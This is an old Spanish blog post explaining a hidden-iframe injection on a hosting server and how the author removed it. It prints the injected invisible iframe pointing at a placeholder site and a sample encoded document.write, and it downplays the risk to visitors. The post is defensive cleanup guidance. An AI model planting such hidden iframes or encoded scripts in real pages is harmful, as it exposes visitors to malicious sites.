Ataque Iframe a Futuro Digital y su solución
Por Futuro Digital | September 13, 2008
Hace unos días el servidor donde está alojado este blog sufrió el llamado “Iframe Attack“. Este ataque no suponía ningún riesgo para los visitantes del blog, ni de ninguna otra web alojada en el servidor que también se infectaron.
La resultado de esta infección fue que en toda página cargada se intentaba cargar otra web de código malicioso. Es decir, dentro de la página visitada, intentaba cargar otra página de forma invisible para mejorar el posicionamiento web de esta página o para infectar con virus o código malicioso a los usuarios.
La infección duró poco y por eso digo que no es peligrosa. Además, para tener un riesgo para los usuarios hace falta que tengan un ordenador con un sistema operativo anterior al XP como el Windows 98 y uno explorador más antiguo que la Internet Explorer o éste sin ninguna actualización. Según las estadísticas del sitio web, raramente alguien utiliza estas configuraciones, es por eso que he esperado a explicar detalladamente su solución para que pueda ser de utilidad para gran cantidad de administradores de sitios web.
El código siguiente, con otra web que se llamaba yahoo-analytics aparecía al final de cada página. Esta web, en el buscador de Google estava bloqueada, y aparecía un mensaje de alerta de virus al intentar acceder al sitio web.
<iframe src=”http://alguna_web.cat”
style=”visibility: hidden; display: none”>
</iframe>
Este código se introdujo en todos los fichero index.htm, index.php e index.html. También apareció en algún fichero que contenía el nombre footer. El origen de la infección fue un fichero que apareció en una carpeta del servidor, que aprovecha la base de datos MySQL del servidor para replicar este código en todos los ficheros. La aparición de este fichero se debe a la instalación de alguna aplicación poco segura de que es utilizada para introducirse en nuestro servidor, así que hace falta ser cuidadosos con qué aplicaciones instalamos en nuestro servidor.
El primer paso para controlar la infección es cambiar la contraseña de acceso a nuestro servidor y localizar el archivo malicioso que origina la infección. Para hacerlo, buscaremos archivos .php o .js que no correspondan a ninguna web de nuestro servidor. En caso de no saber como es el código de nuestra web y no conocer todos los archivos, podemos bajar por ftp todos los archivos y analizarlos con programas anti-spyware como “SpywareTerminator“, “SuperAntiSpyware” o el antivirus que tengamos instalado en el ordenador. Una vez hecho el análisis seguro de que detecta algún fichero malicioso que tenemos que recordar en qué carpeta se encuentra para eliminarlo de nuestro servidor por ftp.
El siguiente paso es buscar por todos los archivos y sacar el código malicioso insertado en forma de Iframe. Para hacerlo lo mejor es utilizar los ficheros descargados en nuestro ordenador provenientes de nuestro servidor, y utilizaremos un buscador de windows que permita buscar dentro de los ficheros como puede ser el “Google Desktop“. Al buscar, miraremos todos los archivos que contengan “Iframe=” y comprobaremos uno por uno si es un iframe que queremos o que corresponde a código malicioso.
También buscaremos el código “document.write” para ver si tenemos un código parecido al siguiente en algún fichero. Puede ser que corresponda al código malicioso. Hay que comprobarlo, pero si vemos que el document.write va seguido por un código codificado seguro de que es malicioso, no dudéis en eliminarlo ya que este tipo de código puede ser muy perjudicial ya que puede modificar nuestros ficheros y borrar parte de la web.
<script language=”javascript”>
document.write( unescape( ‘%70%61%67%65%20%6F%6E%65′ ) );
</script>
Una vez limpios todos los archivos, los subiremos al servidor sobrescribiendo los antiguos y haremos un seguimiento de las páginas de la web infectada. Para hacerlo borraremos la memoria caché del navegador de internet que utilizamos, iremos a ciertas páginas que tengan un código bastante diferente que se encuentren en nuestro servidor, iremos al menú del navegador y visualizaremos el código fuente de la página. Si al final de la página no nos aparece ninguna expresión como iframe src=”http://alguna_web.com” quiere decir que ya hemos limpiado la web.
Este tipo de infección en webs va en aumento y hay que evitar una infección prolongada ya que se puede esparcir. Hay webs muy importantes que han sido infectadas con este sistema y sólo hay un sistema para evitar esta infección, se trata de usar aplicaciones 100% seguras, pero está claro que 100% seguro no hay nada.
Para más información recomiendo estas dos webs:
http://scriptasylum.com/tutorials/encdec/encode-decode.html
http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
Temas: Internet, Seguridad, Tutoriales | 2 Comentarios »
- Los virus informáticos en los teléfonos móviles
- Barack Obama utilizado como trampa para distribuir malware y virus en correos electrónicos
- Saber si una web distribuye virus gracias a Google
- Los Captchas ya no solucionan el Spam
- Lista de falsos programas antivirus y antispyware
July 12th, 2009 at 12:39 am
por casualidad sabes, de que forma te infectaste con el Iframe Attack??
August 7th, 2009 at 3:53 am
¿Como tiene que ver MySQL?